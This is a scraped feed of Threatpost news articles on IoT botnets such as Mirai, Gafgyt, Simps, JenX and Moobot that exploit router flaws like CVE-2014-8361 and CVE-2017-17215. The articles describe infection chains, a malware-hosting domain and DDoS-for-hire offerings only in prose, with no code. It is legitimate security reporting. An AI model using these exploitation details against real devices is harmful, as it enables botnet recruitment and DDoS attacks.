exploits](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>) for initial compromise, for Huawei, Realtek and Dasan GPON devices.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn the current campaign, Gafgyt infects Realtek (CVE-2014-8361) and Linksys endpoints, and then fetches Simps. Simps itself then uses Mirai and Gafgyt modules for DDoS functionality, according to [the analysis](<https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group>), released on Wednesday.\n\nAnother variant of the attack uses shell scripts for downloading Simps.\n\n## **YouTube, Discord Simps Discussions**\n\nThe shell script and Gafgyt can deploy various next-stage Simps payloads for several Linux-based architectures, researchers noted, using the Wget utility. Wget is a legitimate software package for retrieving files from web servers using HTTP, HTTPS, FTP and FTPSa.\n\nOnce the Simps binary executes, it drops a log file that records the fact that the target device is infected, and connects to the command-and-control server (C2).\n\nThe infection logs share commonalities, which allowed the researchers to search for references to them across the broader web. This led to the discovery that the Simps author maintains a YouTube channel to offer demonstrations of the botnet\u2019s functionality, and a Discord server to host discussions about the malware.\n\n\u201cThe botnet might be in the early stages of development because of the presence of the log file after execution,\u201d researchers said, noting that leaving behind an easily discoverable artifact like that isn\u2019t best practice for those trying to stay under the radar.\n\nIn any event, they identified a YouTube video created by a user named \u201citz UR0A,\u201d entitled \u201cSimps Botnet\ud83d\ude08, Slamming!!!\u201d \u2013 dating from April 24.\n\nThe YouTube link also contained a Discord server link for \u201cUR0A\u201d, which was also present in the infection log, the analysis found.\n\n\u201cThe Discord server contained several discussions around DDoS activities and botnets carrying different names,\u201d researchers noted. \u201cOne binary we identified in a chat conversation named gay.x86 displayed a message that \u2018the system is pawned by md5hashguy.'\u201d\n\n## **Attribution to Keksec**\n\nThanks to certain Discord server messages, Uptycs attributed the activity to the Keksec group (a.k.a. Kek Security), which is a prolific threat group [known for exploiting vulnerabilities](<https://blog.netlab.360.com/necro-shi-yong-tor-dong-tai-yu-ming-dga-shuang-sha-windows-linux/>) to invade multiple architectures with polymorphic tools (these can include Linux and Windows payloads, and custom Python malware).\n\nIt\u2019s constantly adding to its arsenal; in January, it was seen deploying the [FreakOut Linux botnet malware](<https://threatpost.com/linux-attack-freakout-malware/163137/>), which does port scanning, information gathering, and data packet and network sniffing, along with DDoS and cryptomining.\n\n\u201cThe group is actively constructing IRC botnets for the purposes of DDoS operations and cryptojacking campaigns using both Doge and Monero,\u201d according to a recent [Lacework analysis](<https://www.lacework.com/the-kek-security-network/>) of the group.\n\nAs evidence for Simps attribution, Uptycs discovered that one of the Discord messages contained a Gafgyt malware sample that contained an \u201cInfected By Simps Botnet ;)\u201d message.\n\n\u201cThis malware dropped a file named \u2018keksec.infected.you.log,\u2019 that contained a message \u2018you\u2019ve been infected by urmommy, thanks for joining keksec.\u201d\n\nAlso, Gafgyt is one of Keksec\u2019s [most-favored tools](<https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/>), according to past analysis, and the group is known for mashing up its code with other binaries to create Franken-malware. For instance, Keksec also operates HybridMQ-keksec, a botnet created by combining and modifying the source code of Mirai and Gafgyt, Uptycs pointed out.\n\nIn the case of Simps, the binaries notably contain modules for launching DDoS attacks against gaming platforms like the Valve Source Engine and OVH. These [were also seen in a variant of Gafgyt](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>) used by Keksec that targeted Huawei and Asus routers and killed its rival IoT botnets.\n\n## **How Enterprises Can Protect Against Botnets**\n\nUptycs recommended a few measures for enterprise users and administrators to identify and protect against botnet attacks:\n\n * Regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary/scripts.\n * Always be cautious in executing shell scripts from unknown or untrusted sources.\n * Keep systems and firmware updated with the latest releases and patches.\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-19T16:53:32", "type": "threatpost", "title": "Keksec Cybergang Debuts Simps Botnet for Gaming DDoS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2021-05-19T16:53:32", "id": "THREATPOST:991E2229B84BA734163394FA362D4D33", "href": "https://threatpost.com/keksec-simps-botnet-gaming-ddos/166306/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:00:30", "description": "New samples of the Mirai malware have been identified, targeting an array of embedded processors and architectures within connected devices.\n\nResearchers said that they discovered new Mirai samples in February 2019, capable of infecting IoT devices running Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. Variants of Mirai have previously targeted CPU architectures like ARM and x86.\n\nWhile it\u2019s not the first time Mirai\u2019s targeting of new processor architectures has expanded \u2013 samples targeting Argonaut RISC Core (ARC) CPUs were discovered in [January 2018](<https://twitter.com/_odisseus/status/952643252116770817?ref_src=twsrc%5Etfw>) \u2013the development shows that Mirai developers continue to expand their targets to incorporate a growing array of IoT devices, researchers with Palo Alto Network\u2019s Unit 42 group said in a [Monday post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe addition of these processors expands the pool of potential devices which can be compromised and used for malicious activity,\u201d Jen Miller-Osborn, deputy director of threat intelligence for Unit 42 at Palo Alto Networks, told Threatpost. \u201cWe can\u2019t confirm all devices which contain these processors or why the actors chose to compile for them.\u201d\n\nXilinx\u2019s MicroBlaze processor and Altera\u2019s Nios II processors are specifically designed for field programmable gate array (FPGA) integrated circuits. FPGAs, which allow users to program hardware circuits to optimize a chip for a particular workload, are used for IoT application application requirements due to their low power.\n\nThe Mirai samples also are capable of infecting Tensilica\u2019s Xtensa processors, which range from small low-power microcontrollers up to neural network processors; and OpenRISC project based-open source CPUs, several of which are also known to run on FPGAs.\n\n[![mirai samples ](https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/08160552/Mirai-Sample-206x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/08160552/Mirai-Sample.png>)\n\nMirai Samples\n\n\u201cExpanding Mirai-like malware to new architectures will only cause further headaches for those responsible for mitigating botnet activity,\u201d Troy Mursch, owner of Bad Packets Report, told Threatpost. \u201cGiven that the source code for Mirai has been open source for years now, this was inevitable. As for the impact of this \u2018expansion\u2019 we\u2019ll have to wait and see. DDoS attacks from Mirai-like botnets continue to plague the internet with some recently reaching nearly 40 Gbps in size.\u201d\n\nThe latest samples were discovered being hosted in an open directory on a single IP. The samples contained exploits that were known to be used in previous versions of Mirai.\n\nThat includes an exploit for a ThinkPHP remote code execution flaw, a D-Link DSL2750B OS command infection and a Netgear remote code execution glitch. Also included were exploits for CVE-2014-8361 (an arbitrary code execution flaw in Realtek SDK) and CVE-2017-17215 (a remote code execution flaw in Huawei HG532 routers).\n\n\u201cThe presence of these exploits in both previous versions of Mirai and our newly discovered samples help show the tie between the two are likely used by the same attacker in this case,\u201d researchers said.\n\nMursch said he has also seen the same exploit attempts targeting the vulnerabilities listed.\n\n\u201cThis is because the targeted devices do not get patched and become re-infected by Mirai-like malware over and over,\u201d he said. \u201cCVE-2017-17215 is notable as it was used by the [Satori botnet](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>) and infected hundreds of thousands of Huawei devices. The author of that botnet is now under indictment by the FBI.\u201d\n\nOn Feb. 22, the server was updated to hide the file listing, researchers said. A full list of Indicators of Compromise (IoCs) are available on their [blog post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\nMirai is best known for being used in a massive, unprecedented DDoS attack that compromised more than 300,000 IoT devices to take down major websites [in 2016](<https://threatpost.com/a-mirai-botnet-postscript-lessons-learned/130529/>).\n\nVariants of Mirai continue to pop up as cybercriminals tap into a growing rate of vulnerable Internet of Things devices. In September, researchers [discovered](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>) new variants for the infamous Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in Apache Struts and SonicWall; and in March researchers said that [a new Mirai variant](<https://threatpost.com/mirai-enterprise-systems/142889/>) was targeting TV and presentation systems used by enterprises.\n\n_**Don\u2019t miss our free**_**_ _**[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)_**, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET.**_\n\n_**A panel of experts will join Threatpost senior editor Tara Seals to discuss**_**_ _**_**how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.**_\n", "cvss3": {}, "published": "2019-04-08T20:40:56", "type": "threatpost", "title": "New Mirai Samples Grow the Number of Processor Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2019-04-08T20:40:56", "id": "THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "href": "https://threatpost.com/new-mirai-samples-grow-the-number-of-processors-targets/143566/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices.\n\nSatori is a derivative of Mirai, the notorious botnet that in 2016 infamously managed to take down Dyn, a DNS hosting provider that supports some of the world\u2019s largest websites.\n\nThe vulnerabilities in question are [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) and[ CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>), which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens [said in a blog post](<https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/>).\n\nRadware\u2019s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee.\n\nEnthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or \u201cmods,\u201d in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own [custom versions of GTA](<https://www.gta5-mods.com/>) for multiplayer action.** \n**\n\n\u201cThe Corriente Divina (\u2018divine stream\u2019) option is described as \u2018God\u2019s wrath will be employed against the IP that you provide us,\u201d Geenens wrote of the site\u2019s DDoS offering. \u201cIt provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a \u2018Down OVH\u2019 option which most probably refers to attacks targeting the hosting service of [OVH](<https://www.ovh.com/>), a cloud hosting provider that also was a victim of the original [Mirai](<https://blog.radware.com/security/2016/10/busybox-botnet-mirai/>) attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.\u201d\n\nShortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. Now the listing included a reference to \u201cbots,\u201d and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop.\n\nWhile derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed \u201cJenX\u201d, is deployed in a different manner than its predecessors.\n\n\u201cUntypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,\u201d he wrote. \u201cNearly all botnets, including [Mirai](<https://blog.radware.com/security/2016/11/insight-into-mirais-source-code/>), [Hajime](<https://blog.radware.com/security/2017/04/hajime-futureproof-botnet/>), Persirai, [Reaper](<https://blog.radware.com/security/2017/10/iot_reaper-botnet/>), Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.\u201d\n\nThe centralized approach employed by JenX trades slower growth for lower detection, he added.\n\nThe danger from JenX should be mostly confined to GTA San Andreas users, Gessens said, but with a stern caveat.\n\n\u201c[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,\u201d he wrote. \u201cI cannot believe the San Calvicie group would oppose to it.\u201d\n\nRadware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet\u2019s server footprint, but it remains active. JenX\u2019s implementation makes taking it down a tricky task.\n\n\u201cAs they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,\u201d he wrote. \u201cThese providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers would be move to the Darknet, it would make it much more difficult to track down the servers\u2019 location and take them down.\u201d\n", "cvss3": {}, "published": "2018-02-02T13:32:17", "type": "threatpost", "title": "JenX Botnet Has Grand Theft Auto Hook", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2018-02-02T13:32:17", "id": "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "href": "https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:58", "description": "Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the[ past several weeks](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), is now public. Researchers warn the code will quickly become a commodity and be leveraged in DDoS attacks via botnets such as Reaper or IOTrooper.\n\nAnkit Anubhav, researcher at NewSky Security first identified the code on Monday that was posted publicly on Pastebin.com. The code is the zero-day vulnerability CVE- 2017-17215 used by a hacker identified as \u201cNexus Zeta\u201d to spread a variant of the Mirai malware called Satori, also known as Mirai Okiru.\n\n\u201cThe fact that the code is now in the open means that more threat actors would now be using it. We can assume that the exploit would become commodity, and IoT botnets that attempt at exploiting a large kit of vulnerabilities will be adding CVE- 2017-17215 to their arsenal,\u201d said Maya Horowitz, threat intelligence group manager, Check Point.\n\n[Last week](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), Check Point identified the vulnerability ([CVE-2017-17215](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>)) in a Huawei home router model HG532 that was being exploited by Nexus Zeta to spread the Mirai variant Mirai Okiru/Satori. Since then Huawei issued an updated [security notice](<http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en>) to customers warning the flaw allows a remote adversary to send malicious packets to port 37215 to execute remote code on vulnerable routers.\n\n\u201cThis code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public it will be used by various script kiddies and threat actors,\u201d Anubhav said. NewSky Security posted [a blog Thursday outlining its discovery](<https://blog.newskysecurity.com/huawei-router-exploit-involved-in-satori-and-brickerbot-given-away-for-free-on-christmas-by-ac52fe5e4516>) of the zero-day code.\n\nThe underlying cause was a bug related to SOAP, a protocol used by many IoT devices, Anubhav said. Earlier issues in SOAP (CVE-2014-8361 and TR-064 ) effected different vendors and was widely used by Mirai variants.\n\nIn the case of CVE-2017-17215, this zero day exploits how the Huawei router uses of the Universal Plug and Play (UPnP) protocol and the TR-064 technical report standard. TR-064 is a standard designed to make it easy to add embedded UPnP devices to a local network.\n\n\u201cIn this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP),\u201d researchers wrote. The UPnP framework supports a \u201cDeviceUpgrade\u201d that can carry out a firmware upgrade action.\n\nThe vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters into the DeviceUpgrade process.\n\n\u201cAfter these have been executed, the exploit returns the default HUAWEIUPNP message, and the \u2018upgrade\u2019 is initiated,\u201d Check Point researchers wrote.\n\nThe payload\u2019s main purpose is to instruct the bot to flood targets with manually crafted UDP or TCP packets.\n\n\u201cThe exploit code was already used by two major IoT botnets, Brickerbot and Satori, and now that the code is public it will be incorporated into different botnet strains,\u201d Anubhav said.\n\nMitigation against attacks includes configuring a router\u2019s built-in firewall, changing the default password or using firewall at the carrier side, Huawei said.\n\n\u201cPlease note that users of this router are mostly home users, who do not typically log in to their router\u2019s interface and don\u2019t necessarily have the know-how, and so unfortunately I have to assume most devices would stay vulnerable,\u201d Horowitz said. \u201cWe desperately need IoT device manufacturers to make security a top priority and not to leave the users accountable.\u201d\n", "cvss3": {}, "published": "2017-12-28T14:01:00", "type": "threatpost", "title": "Code Used in Zero Day Huawei Router Attack Made Public", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "modified": "2017-12-28T14:01:00", "id": "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "href": "https://threatpost.com/code-used-in-zero-day-huawei-router-attack-made-public/129260/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-04T07:17:10", "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look on the html source code of login page, few variables are declared. One of the variables contain a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. \u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much favored than a using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) (MikroTik) and [CVE-2014-8361](<https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/>) are being highly used. One commonality among them is the sheer high number of devices which can be abused using the vulnerabilities. Hence, a security loophole in a big IoT vendor can be a more critical issue than a usual one.\u201d\n", "cvss3": {}, "published": "2018-12-20T20:41:46", "type": "threatpost", "title": "Huawei Router Flaw Leaks Default Credential Status", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2018-14847", "CVE-2018-7900"], "modified": "2018-12-20T20:41:46", "id": "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "href": "https://threatpost.com/huawei-router-default-credential/140234/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-14T18:09:15", "description": "A variant of the Mirai botnet called Moobot saw a big spike in activity recently, with researchers picking up widespread scanning in their telemetry for a [known vulnerability in Tenda routers](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>). It turns out that it was being pushed out from a new cyber-underground malware domain, known as Cyberium, which has been anchoring a large amount of Mirai-variant activity.\n\nAccording to AT&T Alien Labs, the scanning for vulnerable Tenda routers piqued researcher interest given that such activity is typically rare. The targeted bug is a remote code-execution (RCE) issue (CVE-2020-10987).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis spike was observed throughout a significant number of clients, in the space of a few hours,\u201d according to an AT&T analysis, [released Monday](<https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants>). \u201cThis vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November.\u201d\n\nFollowing the breadcrumbs of the activity, researchers tracked down the infrastructure behind the Tenda scans in late March \u2013 discovering that it was being used to scan for additional bugs, in the Axis SSI, Huawei home routers (CVE-2017-17215) and the Realtek SDK Miniigd (CVE-2014-8361). It was also deploying a DVR scanner that tried default credentials for the Sofia video application. These compromise efforts were tied to a variety of different Mirai-based botnet infections, including the [Satori botnet](<https://threatpost.com/satori-botnet-creator-prison/156947/>).\n\n## **Cyberium in Action**\n\nA commonality across all of the activity is that the malware deposited on compromised devices was pulled from the same malware hosting page: dns.cyberium[.]cc.\n\n\u201cWhen this domain was investigated, several campaigns were identified, going back at least one year to May 2020,\u201d according to AT&T. \u201cMost of the attacks lasted for approximately a week while they hosted several [Mirai variants](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>).\u201d\n\nInterestingly, each campaign had its own subdomain page below the top-level Cyberium page, and when it was completed, the subdomain became unresolvable. While active, the campaign would cycle between different Mirai variants: The same URL could be hosting Satori one day and Moobot the week after, according to AT&T.\n\n\u201cThe actors appear to come back to the same domain with a new subdomain for each new campaign,\u201d researchers explained. \u201cActivity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.\u201d\n\nAfter initial compromise of a targeted internet of things (IoT) device, the first request to Cyberium was for a bash script that acted like a downloader.\n\n\u201cThe script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself and finally deletes itself,\u201d according to the analysis.\n\nThis script is very similar to downloaders previously seen for Mirai variants, researchers noted.\n\n## **Moobot Stampedes onto Malware Scene**\n\nMoobot was [first spotted in April 2020](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), using a pair of zero-day exploits to compromise multiple types of fiber routers. Then last October, it was seen going after vulnerable Docker APIs. In all cases, the goal is to add devices as nodes in a botnet used to carry out distributed denial of service (DDoS) attacks, just like [Mirai itself](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>). It isn\u2019t one of the more common variants, however.\n\nOne of the main distinctions of Moobot is a hardcoded string that\u2019s used several times throughout the code, including generating the process name to be used during execution, according to AT&T.\n\n\u201cThe number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,\u201d AT&T noted. \u201cThis could potentially mean that last year\u2019s Moobots samples were used to create new branches of Mirai variants.\u201d\n\nIn a new wrinkle, the observed Moobot samples were encrypted.\n\n\u201cHowever, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as: Private ranges, the Department of Defense, IANA IPs, GE, HP and others,\u201d according to the analysis.\n\n## **Cyberium: Unanswered Questions**\n\nAT&T found that Cyberium has been in action for the past year or so and that it appears to be active still. At the time of publication, some of the Cyberium subdomains were up, but not hosting any malware samples \u2013 potentially indicating that the pages are awaiting new requests for command-and-control server (C2) lists, according to AT&T.\n\nThe researchers said that the cybercriminals behind Cyberium remain somewhat mysterious.\n\n\u201cSeveral questions remain unanswered,\u201d researchers concluded. \u201cWhy would the attackers deliver different Mirai variants with different C2s on the same campaign? Are they trying to avoid anti-virus detection through diversification of variants? Or, are they trying to improve the botnet resiliency by diversifying C2.\u201d\n\n**Join Threatpost for \u201c****[Tips and Tactics for Better Threat Hunting](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)****\u201d \u2014 a LIVE event on ****[Wed., June 30 at 2:00 PM ET](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. ****[Register HERE](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**** for free**\n", "cvss3": {}, "published": "2021-06-14T17:43:34", "type": "threatpost", "title": "Moobot Milks Tenda Router Bugs for Propagation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2020-10987"], "modified": "2021-06-14T17:43:34", "id": "THREATPOST:4C2D088C37CAF9E8959CD8833D4B2668", "href": "https://threatpost.com/moobot-tenda-router-bugs/166902/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-09T11:36:53", "description": "A new Gafgyt variant is adding vulnerable internet of things (IoT) devices to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nThe newly-discovered variant is capable of launching a variety of denial-of-service (DoS) attacks against the Valve Source Engine, a video game engine developed by Valve Corp. that runs popular games such as \u200bHalf-Life and \u200bTeam Fortress 2. Other gaming servers have also been targeted by the botnet, such as those hosting widely-played games such as Fortnite, researchers warn.\n\n\u201cThis Gafgyt variant is a competing botnet to the \u200b[JenX botnet](<https://threatpost.com/jenx-botnet-has-grand-theft-auto-hook/129759/>), which also uses remote code-execution exploits to gain access and recruit routers into botnets to attack gaming servers \u2013 most notably those running the Valve Source Engine \u2013 and cause a denial-of-service,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 research team, in [analysis released Thursday](<https://unit42.paloaltonetworks.com/home-small-office-wireless-routers-exploited-to-attack-gaming-servers/>). \u201cThis variant also competes against similar botnets, which we have found are frequently sold on Instagram.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. The newest Gafgyt variant targets two of the same small-office router remote-code-execution flaws as its predecessor, \u200bJenX, which was disclosed in 2018\u200b.\n\nThe two previously-targeted flaws are CVE-2017-17215 (in the Huawei HG532) and CVE-2014-8361 (in the Realtek RTL81XX chipset). However, the newest variant also targets another vulnerability, CVE-2017-18368, a remote command-injection bug on Zyxel P660HN wireless routers. The Zyxel P660HN-T1A (distributed by TrueOnline) has a command-injection vulnerability in the remote system log forwarding function, which can be accessed by an unauthenticated user, researchers said.\n\nAccording to Shodan, there are more than 32,000 Wi-Fi routers worldwide that are vulnerable to these three flaws.\n\n## Infection and DoS\n\nThe Gafgyt variant first uses three \u201cscanners\u201d to attempt to exploit these known RCE flaws. Then, depending on the type of device targeted, the botnet makes them download either an ARM7 or MIPS binary using \u201cwget,\u201d which is a computer program that pulls content from web servers.\n\nFrom there, the malware connects to a command-and-control (C2) server, sending the device\u2019s information to join the botnet, such as IP address and architecture. From there, the victim device is forced to perform at least five different types of DoS attacks.\n\n\u201cThis Gafgyt variant can perform different types of DoS attacks simultaneously depending on the commands received from the C2 server,\u201d researchers said. \u201cThemain()function of the malware calls another function called processCmd() to process the command and initiate a corresponding attack.\u201d\n\nOne such attack calls the VSE function and contains a payload to attack game servers running the Valve Source Engine. Another calls the \u200bHTTPCF function to attack services security by Cloudflare; still other options target devices that may have been previously infected with competing botnets; or, they can call the endHTTP() function to start an HTTP flooding attack.\n\n\u201cAs previously described, the \u200bVSE command starts an attack against gaming servers running the Valve Source Engine,\u201d researchers said. \u201cNote that this is not an attack on the Valve corporation itself because anyone can run a server for these games on their own network. It is an attack on the servers.\u201d\n\n## Instagram Distribution\n\nUpon further investigation, researchers found several fake Instagram profiles selling the source code for the botnet at a wide range of prices.\n\n[![Gafgyt botnet ](https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/30162826/instagram-300x215.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/30162826/instagram.png>)\n\nAfter going undercover and interacting with these profiles, researchers were offered a \u201cspot\u201d in the botnet servers from $8 to $150 USD. A \u201cspot\u201d means that a person can pay attackers to add a set of IP addresses against which their already-working botnets will launch a DoS attack, researchers said.\n\nResearchers say they contacted Instagram and alerted them of malicious profiles. Instagram did not respond to a request for comment from Threatpost.\n\nLooking forward, researchers said that the Gafgyt variant shows the dangers of insecure IoT devices.\n\n\u201cIn short, an increase of IoT botnets sold on Instagram + low cost + RCE exploits + the presence of wireless routers across all industries means that IoT devices are at increased risk of being recruited into botnets,\u201d said researchers. \u201cThis formula shows why every type of industry must be aware of IoT security and implement measures to prevent devices on their network from getting compromised and degrading business continuity.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to 